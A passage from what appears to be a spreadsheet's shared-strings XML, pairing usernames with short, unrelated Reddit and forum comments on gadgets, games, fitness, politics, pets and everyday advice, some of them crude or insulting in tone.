    <t>About six months ago I spilled a rum and coke directly on my laptop. Like 12 ounces of sticky alcoholic liquid all up inside this $1500 piece of hardware. I thought it was toast, but I got lucky and it never stopped working. Ever since then, however, the keyboard is sticky as fuck. I've taken it apart, but apparently replacing the keyboard is a real bitch of a task. I'm don't do that kind of work in the office and i'm not doing it at home either... I'll tough it out for another 6 months and get a new laptop.</t>
  </si>
  <si>
    <t>taintwest</t>
  </si>
  <si>
    <t>She’s clearly not enjoying herself if she needs to instagram the whole thing. Live in the moment, B!</t>
  </si>
  <si>
    <t>Bigbossbro08</t>
  </si>
  <si>
    <t>Fish trap glitch exists in all version. Won say glitch but it's just a copy pasta of farm mechanics. They collects food from the left corner of tile. Sometimes they are like a bit stopped and wants to move like a farmer but since it's 1 tile they just starts gathering at the same spot with almost close to 0.1(even less but stops for a short period but not huge difference) idle time. It's just works like that.</t>
  </si>
  <si>
    <t>jonsnowjonsnow</t>
  </si>
  <si>
    <t>[Take this mah friend](https://www.reddit.com/user/jonsnowjonsnow/comments/cj5s4d/request/?utm_source=share&amp;utm_medium=web2x)</t>
  </si>
  <si>
    <t>nando14-_-</t>
  </si>
  <si>
    <t>Ohh alright thanks for the tips, and yes the check out does work fine although I only accept PayPal at the moment</t>
  </si>
  <si>
    <t>AmaanB13</t>
  </si>
  <si>
    <t>They could totally make an ad where a random guy sprays it on himself and then becomes a raptor.</t>
  </si>
  <si>
    <t>mbt9000</t>
  </si>
  <si>
    <t>so i have a chronic issue with my shoulders and im always using dumbbells for chest work, however ive not had issues with flat bench press yet, but ive been told that a low incline bench pres is much better for shoulders than flat bench and im just wanting thoughts on it in regards to preventing strain on the shoulder.</t>
  </si>
  <si>
    <t>paper_liger</t>
  </si>
  <si>
    <t>I suspect you aren't a dumb person normally. Why so dumb about this particular story though?</t>
  </si>
  <si>
    <t>sarinonline</t>
  </si>
  <si>
    <t>And that message is that you will buy houses off people that like Trump... A message for the ages for sure. They will remember you as they remember the 300 Spartans.</t>
  </si>
  <si>
    <t>MostlyFifa</t>
  </si>
  <si>
    <t>Yeah it’s a shit game I haven’t owned since Xbox 360 days so idc bout the semantics</t>
  </si>
  <si>
    <t>GangsterSpock</t>
  </si>
  <si>
    <t>Is there a way to download any cars/tracks you don’t have to try them out? I just got iracing last week and I only have the stock content installed. Can’t find where to download the additional cars</t>
  </si>
  <si>
    <t>SCP-3388</t>
  </si>
  <si>
    <t>Move to America and make me black I guess</t>
  </si>
  <si>
    <t>DeathMoJo</t>
  </si>
  <si>
    <t>DeathMoJo , Jul 27, 2019 : Check the settings to the app or maybe your account for twitch? Any other streaming apps limited in resolution?</t>
  </si>
  <si>
    <t>HeySadBoy1</t>
  </si>
  <si>
    <t>TBH I didn’t put it together until I was building a yoked Franchise squad and saw them all.</t>
  </si>
  <si>
    <t>NobodyNoticeMe</t>
  </si>
  <si>
    <t>Popular IMO. Parents make the choice to have kids, and raise them. Any returns in love, family, etc etc., are a bonus.</t>
  </si>
  <si>
    <t>greenysmac</t>
  </si>
  <si>
    <t>Hi there! You must be new to our subreddit. Sorry about this = we removed your post - And we want you to know why. ##SO, PLEASE READ THIS. We have a pinned post at the top of the subreddit that you missed about if you want feedback. http://www.reddit.com/r/Videoediting [/r/videoediting rules](https://www.reddit.com/r/VideoEditing/about/rules/) [/r/videoediting sidebar](https://www.reddit.com/r/VideoEditing/about/sidebar/) MODS</t>
  </si>
  <si>
    <t>itcantbefornothing</t>
  </si>
  <si>
    <t>Excellent, was not what I expected sr all honestly</t>
  </si>
  <si>
    <t>a_wisp</t>
  </si>
  <si>
    <t>Sorry if this is not the appropriate sub. I am unsure where I could post to ask this question. I would like to transfer it to another vehicule and was wondering it this can be done... Subaru said no but I doubt.. I paid for it after all. Thanks,</t>
  </si>
  <si>
    <t>HooD00</t>
  </si>
  <si>
    <t>Get two. Trust me, I’m an expert.</t>
  </si>
  <si>
    <t>LelouchV</t>
  </si>
  <si>
    <t>From device manager, go to the driver for it and choose to update it. Click to choose from a list of drivers rather than it to search for the most up to date one. From there, simply choose a driver that isn't the currently installed one. If there's only one choice there or the issue persists, try the drivers that come by default for your system that you can get here: https://pcsupport.lenovo.com/br/en/products/laptops-and-netbooks/thinkpad-x-series-laptops/thinkpad-... EDIT: Looking up the X1 Yoga drivers leads me to X1 carbon drivers. I'm not sure if they're the same drivers or if they're compatible, but I assume they likely will be. If they don't work, you can always go back to your previous driver versions. Let me know what happens.</t>
  </si>
  <si>
    <t>GordonHaywardBroken</t>
  </si>
  <si>
    <t>Desperate women are desperate to be heard*</t>
  </si>
  <si>
    <t>Transasarus_Rex</t>
  </si>
  <si>
    <t>I love Love's! I'm so glad to hear that they're adding fenced-in areas for dogs, that's super exciting.</t>
  </si>
  <si>
    <t>Kingma15</t>
  </si>
  <si>
    <t>I felt like it was a re-write of Dexter to be honest, but not as satisfying.</t>
  </si>
  <si>
    <t>DeltaTester</t>
  </si>
  <si>
    <t>Don't start there. Don't try to read everything. Don't try to read everything in order. Just get the brand-new House of X #1, from this week, and if you like it poke around for the well-regarded older stuff. YOU DO NOT HAVE TO READ IT IN ORDER.</t>
  </si>
  <si>
    <t>evjikshu</t>
  </si>
  <si>
    <t>There is enough evidance to prove jews were enslaved. And since we know they later on apoeared in Chanaan - kinda makes the whole exodus thing legit. But, it doesn't mean it was happening exactly us it is been writen in bible either.</t>
  </si>
  <si>
    <t>Ma1eficent</t>
  </si>
  <si>
    <t>Call a local quarry, they'll deliver a half ton of stone for less than $100</t>
  </si>
  <si>
    <t>Pep-Fraudiola-Balda</t>
  </si>
  <si>
    <t>Thanks, mate. I was lost for a while</t>
  </si>
  <si>
    <t>jsphbtst</t>
  </si>
  <si>
    <t>Let's Paint TV is a blessing to the world.</t>
  </si>
  <si>
    <t>AllTheStars07</t>
  </si>
  <si>
    <t>No I just brace myself for my dog to start barking up a storm.</t>
  </si>
  <si>
    <t>eddietwang</t>
  </si>
  <si>
    <t>WHY DID YOU SUBMIT THIS RIGHT AFTER I USED MY LAST SHOVEL???</t>
  </si>
  <si>
    <t>Good_Apollo_</t>
  </si>
  <si>
    <t>Yup. It took me all of a second to read, and I’m an idiot per my ex wife, so really isn’t don’t dead open inside material.</t>
  </si>
  <si>
    <t>metahivemind</t>
  </si>
  <si>
    <t>Adam Lee, is that you?</t>
  </si>
  <si>
    <t>euros221b</t>
  </si>
  <si>
    <t>I wish we could save them all, they are absolutely precious.</t>
  </si>
  <si>
    <t>revuhlution</t>
  </si>
  <si>
    <t>My party of 4 level 3s avoided the young green dragon from LMoP and have ordered a big ass chain-fence type object they are going to try and use over the top of the tower (with the dragon inside. They will be level 5 Young green dragon is CR 8, so I'm going to add in a few zombies, giant spiders, and have the dragon cultists return to defend the dragon.</t>
  </si>
  <si>
    <t>MimsPartyofThree</t>
  </si>
  <si>
    <t>Jelly Bean</t>
  </si>
  <si>
    <t>intotherabithole</t>
  </si>
  <si>
    <t>Now thats a whole lot of bullshit for one post</t>
  </si>
  <si>
    <t>chasemaddigan</t>
  </si>
  <si>
    <t>Kind of an obvious one I just thought of, but "What if the Snap killed the other half of the universe?". Would the survivors bring everyone back quicker then in the main timeline, if at all? Edited by chasemaddigan on Jul 22nd 2019 at 12:47:16 PM</t>
  </si>
  <si>
    <t>warextra</t>
  </si>
  <si>
    <t>I have a 'nicely' cut out cardboard piece. I'm too lazy to grab tape</t>
  </si>
  <si>
    <t>nightpanda893</t>
  </si>
  <si>
    <t>Everyone talks about this and I have no idea how I avoided it. Of course I see my friends less than the years of seeing them daily at school, but we still talk often, have dinner together, hang out around a fire, and even go on trips together. If some time goes by without seeing one another it's always like no time has passed at all.</t>
  </si>
  <si>
    <t>ImEmBearEst</t>
  </si>
  <si>
    <t>Inhouses would yust make the rpoblem bigger not solve it</t>
  </si>
  <si>
    <t>FiftyOneMarks</t>
  </si>
  <si>
    <t>They are on their own but the movie purposely goes out of their way to ignore anything and everything that happens on AoS. This isn’t news, it’s actually been something that’s been known for awhile.</t>
  </si>
  <si>
    <t>moloy559</t>
  </si>
  <si>
    <t>I honestly don’t like how it looks with out the hex grid, it makes the map look really empty in some parts. The obvious solution there is to fill in some of the empty space. Thanks for the advice about mountains, I will keep that in mind when designing my next map.</t>
  </si>
  <si>
    <t>benpaustin</t>
  </si>
  <si>
    <t>That sounds nice. Moonlight I bet makes the beach look really nice!</t>
  </si>
  <si>
    <t>slimcoder</t>
  </si>
  <si>
    <t>Poor, poor Pernida (shakes head). I was rooting for that little bastard but Mayuri just had to pull a Nemu again. I AM THE DRAGON!!!!</t>
  </si>
  <si>
    <t>Upsetty325</t>
  </si>
  <si>
    <t>Can I also interest you in this great deal 3 for $9</t>
  </si>
  <si>
    <t>Ralliman320</t>
  </si>
  <si>
    <t>Wicked! My most surprising find so far was something that genuinely looked like a fairy-tale troll with little butterfly wings tacked to its back, which were actually used to fly/float around. (This thing was taller than my hauler, btw.)</t>
  </si>
  <si>
    <t>LemurKermit</t>
  </si>
  <si>
    <t>It is not small and convenient, it’s just small convenient and metal quality</t>
  </si>
  <si>
    <t>eaglem</t>
  </si>
  <si>
    <t>Sure seems like it by the looks of the load she's carrying. Attached Images View Picture EXIF EXIF Information</t>
  </si>
  <si>
    <t>loudsilence1680</t>
  </si>
  <si>
    <t>Mushrooms</t>
  </si>
  <si>
    <t>Itiswhateves</t>
  </si>
  <si>
    <t>That’s awesome! Whatever the case, I’m glad you got to experience positive moments with both sex.</t>
  </si>
  <si>
    <t>stillwaiting3bh</t>
  </si>
  <si>
    <t>Unless it’s under 100k miles I wouldn’t pay more than $4500.</t>
  </si>
  <si>
    <t>dfu05229</t>
  </si>
  <si>
    <t>Plans have changed and I no longer need it so free to first person who replies. Megabus - Sunday 28th Bus leaves at 1pm from Buchanan Bus Station Arrives at Shudehill at 5.30pm I can send over the PDF for the ticket</t>
  </si>
  <si>
    <t>Hyper1224aka</t>
  </si>
  <si>
    <t>my grandpa has one and i love it</t>
  </si>
  <si>
    <t>wraithtek</t>
  </si>
  <si>
    <t>a.) That's not the title. b.) Nothing in the article says anything of the sort. c.) OP is lying.</t>
  </si>
  <si>
    <t>JustAskCharley</t>
  </si>
  <si>
    <t>You’re just as relevant as the rest of us. I feel the opposite a lot. I’m 36 and feel like I’m way old compared to the sub group . But everybody is usually very helpful and supportive. A trick I learned is to find something that really relaxes you. I usually play stardew valley or solitaire to absorb my brain and help me relax if I’m feeling like I can’t shut down. The origami flowers sound adorable. This something sweet that can be saved forever.</t>
  </si>
  <si>
    <t>JavaJunkie_exe</t>
  </si>
  <si>
    <t>Yeah it’s a really good documentary.</t>
  </si>
  <si>
    <t>BrodAdams</t>
  </si>
  <si>
    <t>Just to fuck with us. Everybody was expecting it early yesterday and half the sub went fucking bananas because they didn't post it earlier. They love to fuck with us.</t>
  </si>
  <si>
    <t>cestvagabond</t>
  </si>
  <si>
    <t>I was looking at the faces of the diplomatic corps when he was mentioning it, the face of Denmark's Ambassador was gold. But he had to keep it considering Chinese Ambassador was seating next to him.</t>
  </si>
  <si>
    <t>Oggy123</t>
  </si>
  <si>
    <t>Mc Donalds ! Mcdonalds!: We have food at home: Orders a single black coffee and leaves: Edited by Oggy123 on Jul 23rd 2019 at 9:30:14 PM</t>
  </si>
  <si>
    <t>Roadsguy</t>
  </si>
  <si>
    <t>I knew it had to be Cleveland because you can see US 6 and 322 signs when neither route goes anywhere near D.C. They missed a spot. :P</t>
  </si>
  <si>
    <t>must_defend_500</t>
  </si>
  <si>
    <t>Thanks for the message, I am not sure when you had your look. But this is an old problem that we solved. We just had to understand the library better.</t>
  </si>
  <si>
    <t>EpicalBeb</t>
  </si>
  <si>
    <t>This is the power of requiem.</t>
  </si>
  <si>
    <t>IronFalcon1997</t>
  </si>
  <si>
    <t>Does anyone know if you can recruit Hubert at any point? I have to have that design on my team!</t>
  </si>
  <si>
    <t>Chaost</t>
  </si>
  <si>
    <t>Plot twist #3: It was all a rouse to get OP frazzled when he was signing his contract. OP is no longer the proud owner of a soul.</t>
  </si>
  <si>
    <t>bolanrox</t>
  </si>
  <si>
    <t>was he any good? cant they higher him?</t>
  </si>
  <si>
    <t>That’s part of your plug but probably not the whole thing.</t>
  </si>
  <si>
    <t>SnailSnake</t>
  </si>
  <si>
    <t>There is a lot of thirsty reddit virgins. Upvote for kitty, downvote for titty</t>
  </si>
  <si>
    <t>CarmenFandango</t>
  </si>
  <si>
    <t>Yes. O'Rourke and now apparently Yang makes 7 in September, with Booker and Klobushar meeting the polling and Castro meeting the donor requirement.</t>
  </si>
  <si>
    <t>MountainLiving4us</t>
  </si>
  <si>
    <t>Time is money .. If you have the time ... You'll make the money ..</t>
  </si>
  <si>
    <t>LCO45</t>
  </si>
  <si>
    <t>I’ve thought about this as 19 was my first year of feeds. I decided NO. However, I got a lot of laughs out of Kevin ripping on people and could relate to a lot of his stories about growing up. There’s not one person I find funny this season.</t>
  </si>
  <si>
    <t>EnglishTeachers</t>
  </si>
  <si>
    <t>Listen. Always listen. A lot of times, parents will come to you angry after not being satisfied by someone else. A lot of times, those parents just want to feel heard and they want to feel that someone cares enough to understand why they’re angry. Let parents talk all that out, then ask thoughtful questions. I’m not saying that you should always give a parent exactly what they want, but even if your answer to a parent is “no,” they’ll feel better that someone cared enough to sit and listen. Listen to teachers, too. Touch base frequently with new teachers. Just a walk-by with a “how was your day?” can make new teachers feel seen and supported. All faculty expectations should be written down and updated yearly. This cuts down on miscommunications, especially since you’ll always have teachers coming and going every year. Don’t send site wide emails with “friendly reminders” when it’s just a few faculty members breaking a rule. They’ve already received a written list of faculty expectations, so they can’t claim ignorance. Interact directly with those that are not meeting expectations. Verbal is fine for small things or one-off issues, but after that, start sending emails for documentation purposes. Expectations should include things like: 1. What time do you expect teachers to be on campus? 2. Are teachers required to offer tutoring? How often? 3. How do you expect teachers to communicate with parents? For example, my campus requires us to respond to parent calls and emails by the end of the next business day. 4. Include site-wide (or in some cases, district-wife) rules about late work and reassessment. 5. Happy hour attire. You probably want to tell your teachers that they shouldn’t be wearing school spirit wear while drinking in public during Friday happy hour. Maybe this one is a little bit location-dependent. My sister just moved to Milwaukee. From her description of the culture, I don’t think parents would care if their kids’ teachers went for a pint after school. In my uppity suburban Houston area, I’m careful to cover or obscure my spirit wear when we go to happy hour, because I don’t want to invite trouble. 6. For middle and high school: are teachers expected to monitor the hallway between classes? Are teachers expected to do morning/afternoon duty? Lunch duty? 7. When are lesson plans due? What format? 8. Is team planning an expectation on your campus? For grades that score assignments, do all the teachers on the same level have to have the same exact grades, or can they vary a little? Do teachers on the same level have to give the same tests? All sorts of stuff like this.</t>
  </si>
  <si>
    <t>joot77</t>
  </si>
  <si>
    <t>I managed to fix my problem by plugging it into the pc directly instead of usb port. After a pc restard and that it works properly and has good sound and speech. I bought it for 50 bucks so I do think it's worth it.</t>
  </si>
  <si>
    <t>offensiveusername69</t>
  </si>
  <si>
    <t>Depends if you’re “pruning” a branch, or “pinching” candles. Pines grow differently and there’s a very specific time of the year to do the pinching. Pruning (taking off a branch) is less finicky with timing</t>
  </si>
  <si>
    <t>atMalkyor</t>
  </si>
  <si>
    <t>Requiem For a Dream, Watchmen, Pulp Fiction</t>
  </si>
  <si>
    <t>EhDub13</t>
  </si>
  <si>
    <t>YEEES I love this SO MUCH</t>
  </si>
  <si>
    <t>datascientist36</t>
  </si>
  <si>
    <t>[It's to bad he doesn't have the power to exonerate ](https://www.youtube.com/watch?v=4GSg8VW0lJg&amp;feature=youtu.be)</t>
  </si>
  <si>
    <t>yakri</t>
  </si>
  <si>
    <t>Sure, but the point is it isn't particularly helpful for CS professionals to persue additional non tech creative persuits, or spend more time away from monitors. This is something that's worked for you, but not something that even makes sense as general advice. Same goes for what the op said on the topic.</t>
  </si>
  <si>
    <t>mrjake118</t>
  </si>
  <si>
    <t>Jew surgery?? No need to be anti-Semetic about it! (Yes that's a joke about his typo.)</t>
  </si>
  <si>
    <t>OneSchott</t>
  </si>
  <si>
    <t>I'll add router to the list of things to reset as well.</t>
  </si>
  <si>
    <t>iamtheone11111</t>
  </si>
  <si>
    <t>The thing Is, he is the one giving these directors and writers chances, most of these guys are nobodies and other stars can't afford to work with them nowadays since their fees are too high.. Younger lot wouldn't want to take these risks as their careers can disappear any moment.. That is why I like these mid-stars: Akshay Ajay Saif Emran.. they do films at a lower budget and can work well with newcomers and don't seem too arrogant..</t>
  </si>
  <si>
    <t>RL Relocation LLC</t>
  </si>
  <si>
    <t>The layout, we need to see the whole room so we can tell what is going on. Im not sad about your rug, but i am sad that every thing seems gray and a tad monotone. The picture frame on the wall is not working, you need some color pop in here and I would start with art work, thus you can pull colors out of that.. I just dont see anything in the room that expresses your style, it looks like a showroom. So post some more pictures of this room and maybe another room close by so we can gather a little more info.</t>
  </si>
  <si>
    <t>cloudybankz</t>
  </si>
  <si>
    <t>The 40 mile Hike in Yosemite California, I started my trip with only a backpack of the most needed essentials and left my materialistic busy life behind me. It was a 4 day journey through the unknown. An experience of a lifetime that reminds you where we all came from. TRAILHEAD HETCH HETCHY</t>
  </si>
  <si>
    <t>Rene T</t>
  </si>
  <si>
    <t>Who was talking about jackstands under a park model? Not me. Ernie just happened to mention the jacks for a house not a park model. Then I started talking about Code in my town for the use of jackstands under a house not a park model.</t>
  </si>
  <si>
    <t>LauraMichel</t>
  </si>
  <si>
    <t>"Essentially If I get a girl result I will believe it. If I get a boy result I won’t believe it haha." 😂😂 Thanks for the reply! I'm so eager to know what your results are!! I may go ahead and try it... Did you have trouble getting enough blood for the vials? That part sounds kind of awful to me tbh. 😬</t>
  </si>
  <si>
    <t>BDRAIDR</t>
  </si>
  <si>
    <t>All the best!</t>
  </si>
  <si>
    <t>johncas</t>
  </si>
  <si>
    <t>For £35 you can just go to the shop and buy at least 10 Slush Puppies anyway!</t>
  </si>
  <si>
    <t>Tsuzuku</t>
  </si>
  <si>
    <t>As long as the bunny head is higher than the butt, it should be ok.</t>
  </si>
  <si>
    <t>Aichael</t>
  </si>
  <si>
    <t>Hey man, this took me a while to make. I wish I could post this sooner but r/teenagers didn't allow me :(</t>
  </si>
  <si>
    <t>DeezNuts0218</t>
  </si>
  <si>
    <t>I’m not really depressed and I thank my lucky stars everyday that I have great people behind me to keep me out of those dark headspaces. But I’m here for you man and everyone else who suffers from it in this subreddit. I had a time in my past when I used to think at times “would it really be so bad if a truck ran me over or a meteor smashed into my body right this second?” I’ve had those days where I just stayed in bed because I couldn’t think of a good enough reason to get up. It’s a lot of dark shit bottled up in our heads man and the best thing we can do about it is to just open that bottle cap and talk to people. Doesn’t even have to be about depression, even sports, or news, or anything you’re passionate about. And if nothing else, I’m here to talk and listen. So whenever you have those really low days, just hit up ya boy DeezNuts!</t>
  </si>
  <si>
    <t>rpdorm</t>
  </si>
  <si>
    <t>Because there's no advantage to go off track in that particular corner.</t>
  </si>
  <si>
    <t>gunrumner38</t>
  </si>
  <si>
    <t>I have a Question for you. What Branch of the church are you then? Most of the people here are Brighamites (LDS) based out of Utah. I started there then drifted to the Church of Christ Temple Lot because that's where the Whitmerite branch, my family, got absorbed into. Now I'm out totally. But I'm just curious of other branches mostly because there are so few people from them. PM me if you want. I'd love to hear from you!</t>
  </si>
  <si>
    <t>gunmetalgrey</t>
  </si>
  <si>
    <t>@staticspeedster : @ichbingott : @lan_fan : @tenguswordsman : @shadowwaker : @castiel_18 : @amnesiak : @gilgameshthepimptoendallpimps : @chronicplane : @giliad_ : @judasnixon : @outside_85 : @indomitableregal : @diarrhearegatta : @Penguin-Dust : @bella_blackstar : @heroup2112 : @xwraith : @darkpsychiclord_prime : @kairan1979 : @referee : @rac95 : @crimson_lord : @life_without_progress : @jwwprod : @kiba : @theonewhopullsthestrings : The DL-44 wins. Here we go, Quarterfinals time! Match 1: Samus' Arm Cannon (Metroid) VS. Gravity Gun (Half-Life)</t>
  </si>
  <si>
    <t>Marilius</t>
  </si>
  <si>
    <t>A year or two. Or five. I make decent cash, but, a year or two isn't going to be enough to bring a fully loaded RS6 Avant into MY price range :D</t>
  </si>
  <si>
    <t>staticsnake</t>
  </si>
  <si>
    <t>&gt; freedom of speech Has nothing to do with private platforms.</t>
  </si>
  <si>
    <t>Lunatik</t>
  </si>
  <si>
    <t>Volica said: ↑ They are not rookies by NHL standards. We happy here chief? Click to expand... Yes, because rookie and prospect and not synonymous</t>
  </si>
  <si>
    <t>D-River</t>
  </si>
  <si>
    <t>soontobeautomated said: Sydney rates are $2.50 per trip Plus 40 cents a minute (estimated time as paxhole orders) Plus $1.45 a km (estimated distance as paxhole orders) Where applicable, tolls and wait time maybe added. If you are not aware of this and checking your trips regulalrly, then you have no idea to learn when FUber is rorting you, so you cannot learn. Off topic in my experience, wait times are now often factored OFF the fixed fare on most trips that are not min fare. (Ie still listed but a $2 wait time will just come off the total fare and be listed seperately). I''d be curious if any drivers that order a FUber as a pax would try keeping the driver waiting 30 seconds to see if their "estimated"" fare actually increases by 30 cents. I would myself, but I never use FUber. I hate fixed fares with a passion. Getting stuck in traffic is not the drivers fault, but we cop it. Almost as bad.... when a driver takes a direct route, travels at the speed limit the whole trip and rarely stops yet you still get rorted on fixed fares. In these circumstances, I can only conclude that FUber expects drivers to drive dangerously and exceed posted speed limits (or they are immoral and full of lies or both). Click to expand... Drive DiDi if you don’t want fixed fares.</t>
  </si>
  <si>
    <t>Bleasdale24</t>
  </si>
  <si>
    <t>Where is the real science? There were more science programmes on UK telly 30 years ago than now. BBC science programmes? No weekly magaziner programme on science in UK and the world. Absolutely disgraceful. The TV in search for audience is terrified of producing programmes for the educated. Dumbing down works.</t>
  </si>
  <si>
    <t>CurlyAce84</t>
  </si>
  <si>
    <t>Example Use Case: A user can create a video object and assign it to another user. But I only want them to be able to assign it to other users that are part of their channel. Videos N:1 User Videos N:1 Channel Users N:N Channel If they tried to execute a POST request and assign the video to a userID that isn't related to their channel, I wouldn't want to allow them to create the video object yet, and send an error message back to the initiating user. Where should this kind of validation take place? The model level, the serializer level, the view level?</t>
  </si>
  <si>
    <t>purplegrass77</t>
  </si>
  <si>
    <t>well yeah but it can also mean immune in general which means that it can`t be harmed by anything and i think this is the problem you are arguing like the meaning is ,,immune to something,,and i`m arguing like it`s immune ,,in general,, so i think that`s why we can`t agree actually.</t>
  </si>
  <si>
    <t>pccuck</t>
  </si>
  <si>
    <t>thanks alot brother! i will do the changes.</t>
  </si>
  <si>
    <t>bento_box_</t>
  </si>
  <si>
    <t>This literally says society about nothing a lot</t>
  </si>
  <si>
    <t>Zentikwaliz</t>
  </si>
  <si>
    <t>https://pcpartpicker.com/product/ZRQG3C/corsair-vengeance-750-w-80-silver-certified-semi-modular-atx-power-supply-cp-9020176-na</t>
  </si>
  <si>
    <t>LisaDiKaprio</t>
  </si>
  <si>
    <t>Thank you!! I'm sorry I have no idea, my friend gave me her old stash and it had no label on it</t>
  </si>
  <si>
    <t>Literate77</t>
  </si>
  <si>
    <t>He could have also became a bank robber and made a lot more money.</t>
  </si>
  <si>
    <t>SladeThePunisher</t>
  </si>
  <si>
    <t>The only real problems in life are with health and relationships, anything else can be solved with money - Matthew Woodsworth</t>
  </si>
  <si>
    <t>N0T_a_Psychopath</t>
  </si>
  <si>
    <t>Yeah its crossed my mind. By the way channel 4 did a show where people where locked in solitary. Maybe it would interest you.</t>
  </si>
  <si>
    <t>Kokomanman</t>
  </si>
  <si>
    <t>Kakeguiri is on Netflix and it’s a very interesting show. Jojo is only on Netflix in America and for the memes alone, it’s worth a watch</t>
  </si>
  <si>
    <t>soelouch</t>
  </si>
  <si>
    <t>I want pictures of this pizza how do you put avocado on pizza did you eat it all who invented this</t>
  </si>
  <si>
    <t>ampmadscientist</t>
  </si>
  <si>
    <t>d10221 said: ↑ Greetings, I've landed here searching for CODE amp's info, details ...etc And I thought it would be the polite thing to say Hi 1st Cheers D. Click to expand... Welcome to the forum .</t>
  </si>
  <si>
    <t>uzair7866</t>
  </si>
  <si>
    <t>these courses on udemy a) The Python Mega Course: Build 10 Real World Applications **VS** b) Complete Python Masterclass which one is best for a beginner</t>
  </si>
  <si>
    <t>impossiber</t>
  </si>
  <si>
    <t>I think if anything that will be a great help on getting a team in Seattle if the NBA expands and I honestly think it will.</t>
  </si>
  <si>
    <t>CoolAppointment</t>
  </si>
  <si>
    <t>&gt;The speed is way higher than what the YouTube Javascript client would ever request. There's no interaction to the server from the Javascript client that's what i figured. that's it's way too fast to be streaming and obviously a download, but probably not the type of activity they care enough about to send a letter to the ISP vs. p2p activity.</t>
  </si>
  <si>
    <t>PayWasPathetic</t>
  </si>
  <si>
    <t>Let your life proceed by it's own design</t>
  </si>
  <si>
    <t>anampastrana</t>
  </si>
  <si>
    <t>I don't know how to call it :( Me, digital 2019</t>
  </si>
  <si>
    <t>awsome952</t>
  </si>
  <si>
    <t>That’s solstice of heroes not solar week</t>
  </si>
  <si>
    <t>Synklahr</t>
  </si>
  <si>
    <t>Have you read it?</t>
  </si>
  <si>
    <t>urpwnd</t>
  </si>
  <si>
    <t>Understood, and I’m not trying to shoot the messenger. It’s just kind of amazing that someone, anyone, is still like “let’s make the name for our fandom a slur. because lulz.”</t>
  </si>
  <si>
    <t>macsta</t>
  </si>
  <si>
    <t>For fifty years there's been international agreement not to put weapons in space. Trump tore up that consensus in January just to distract his morons from news of his own criminality. Now only months later the arms race in space is on. We will all live under a permanent arsenal of weapons no longer confined to their host country but above all out heads all the time. Another breath-taking fuckup from the dumbest POTUS ever.</t>
  </si>
  <si>
    <t>gaenji</t>
  </si>
  <si>
    <t>I got the horses in the back</t>
  </si>
  <si>
    <t>ThePizzaMuncher</t>
  </si>
  <si>
    <t>I think they said they'll have another round of collector's editions or something for the steam version, so I don't see why they wouldn't release this for Steam too.</t>
  </si>
  <si>
    <t>Weedwacker3</t>
  </si>
  <si>
    <t>I don’t know what your rant has to do with my comment. All I’m saying is you look like an idiot when you call this “mainstream media”. Your response only further cements that you have no idea what mainstream means</t>
  </si>
  <si>
    <t>stillakilla18</t>
  </si>
  <si>
    <t>Minimal, elegant, and wholesome. I love it</t>
  </si>
  <si>
    <t>aCNDerivative</t>
  </si>
  <si>
    <t>It's a good insight into how early he created the Boris persona for defence. At the end of the day though, I work in academia and know several *extremely* intelligent people who lack all manner of common sense and life skills. It's possible that people are separating his academic intelligence from his personal and emotional intelligence. The difference between intelligence and wisdom, perhaps?</t>
  </si>
  <si>
    <t>limache</t>
  </si>
  <si>
    <t>Why is my iPhoto % in iCloud stuck at 6%? I have 70 gbs of photos and videos on my phone and my iCloud is 1TB I have fast internet (100mbps) and I plug my iPhone in when I sleep. So shouldn’t it all be uploaded in the background ? I’ve also noticed that my videos do lag a bit when I try to play them and I can only play them when I have Wifi. I thought uploading to iCloud would be good but it hasn’t fully uploaded and it’s slow to access via data.</t>
  </si>
  <si>
    <t>themisc</t>
  </si>
  <si>
    <t>The long game</t>
  </si>
  <si>
    <t>stanleysteamer27</t>
  </si>
  <si>
    <t>Anyone wanna chat? I'm 13 and a gamer overall I'm a nerd hmu if you wanna chat P.S: might not respond till tomorrow</t>
  </si>
  <si>
    <t>TurtleManRoshi</t>
  </si>
  <si>
    <t>Can you prove he’s homophobic?</t>
  </si>
  <si>
    <t>Gwaptiva</t>
  </si>
  <si>
    <t>What I don't get is why some people think that supporting Brexit is fine because it's about reclaiming sovereignty, but that same reason is dismissed if it's about Scottish independence... ok, I do get it, but wasn't gonna name-call</t>
  </si>
  <si>
    <t>pigeon_boi420</t>
  </si>
  <si>
    <t>This guy seems to me like a serb</t>
  </si>
  <si>
    <t>Highlander17</t>
  </si>
  <si>
    <t>My older dog definitely house trained the puppy. Some of the other commands are a bit tougher to transfer but he would yell at her himself when she had an accident and would learn her signs and just push her towards the door. Fully house broken in a well, was amazing.</t>
  </si>
  <si>
    <t>Consultant</t>
  </si>
  <si>
    <t>for more than a year Pros Great people and teams Awesome benefits Great learning and challenge Smartest people you will ever meet High stress Cons Long hours Little flexibility Can get transitioned out (fired) even though you are working super hard</t>
  </si>
  <si>
    <t>Parker_GTAV</t>
  </si>
  <si>
    <t>Scream Koke, TOTS Griezmann, 96 SBC Godin, Futties Perisic. And I have 900+ games online this year. Also Scream Diego Costa I've only played against once or twice. The Man has 214vgp and 133 goals for me (all online)</t>
  </si>
  <si>
    <t>Morrighaine</t>
  </si>
  <si>
    <t>That’s wonderful! Hope everything works out!</t>
  </si>
  <si>
    <t>crocodino</t>
  </si>
  <si>
    <t>NTA. There was probably a better way to go about it, but that onion definitely did not need to be cut. If I'm to believe you about that type of behavior being her M.O. then you need to set boundaries for a variety of reasons. For yourself, and your marriage. Hopefully, you are able to handle it better in the future. However, you do NOT want to give into this behavior. That is a downward spiral, you don't want to try and get out of. I'd rather you be a slight jerk than go down that rabbit hole.</t>
  </si>
  <si>
    <t>5quirre1</t>
  </si>
  <si>
    <t>maybe if you cone down from your crossfade you will realize your hair is just one of the mistakes you have made this night.</t>
  </si>
  <si>
    <t>Chetnik-Chad</t>
  </si>
  <si>
    <t>Bruh ahahaha, good on you but the posts going OOGA BOOOGA WHITES STEALING OUR MATES (lmao at that terminology) contrast really well with the YO IMA GET THESE WHITE KOREABOO BITCHES posts. Just putting that out there, now go turn those matches into dates.</t>
  </si>
  <si>
    <t>treedon270</t>
  </si>
  <si>
    <t>That last bit about simple instruction and going nuts is a pretty common occurrence with dnd.</t>
  </si>
  <si>
    <t>Linda</t>
  </si>
  <si>
    <t>It works, but not happy how the lock on the handle works. From the inside you cannot tell if it\u2019s locked. If you turn the handle, regardless if it\u2019s locked it will unlock. Will be buying a different set</t>
  </si>
  <si>
    <t>&gt;&gt;220387091 How the fuck could Germany attack Japan? Please... Tell me</t>
  </si>
  <si>
    <t>AZnder</t>
  </si>
  <si>
